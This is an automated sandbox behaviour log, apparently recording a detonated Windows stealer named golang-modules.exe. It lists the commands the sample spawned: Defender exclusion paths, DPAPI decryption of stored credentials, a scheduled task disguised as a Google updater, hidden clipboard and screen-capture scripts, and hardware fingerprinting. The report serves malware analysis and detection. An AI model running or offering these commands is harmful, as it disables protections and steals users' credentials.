Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,136,189,34,74,147,133,60,232,14,60,255,73,188,213,48,222,168,142,253,158,248,133,177,139,88,77,61,151,164,102,155,199,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,0,199,30,189,167,167,11,187,110,144,216,122,248,70,97,140,73,214,114,118,171,5,17,181,195,185,79,195,66,51,65,48,0,0,0,136,212,114,34,12,100,149,93,133,55,135,123,14,54,78,227,90,179,39,207,67,251,86,83,147,108,45,88,219,161,237,51,30,59,93,206,64,185,123,13,105,154,32,135,149,44,94,219,64,0,0,0,199,49,210,98,232,67,7,168,248,100,118,31,55,2,255,180,150,58,185,169,41,93,199,129,193,83,93,21,116,52,166,144,1,169,141,205,12,19,247,89,22,244,86,254,137,103,207,81,105,218,121,206,85,43,186,110,147,124,58,17,202,177,238,15), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CaptureScreens.ps1""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CaptureScreens.ps1"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get processoridJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic PATH Win32_VideoController GET Description,PNPDeviceIDJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CaptureScreens.ps1"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CaptureScreens.ps1"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
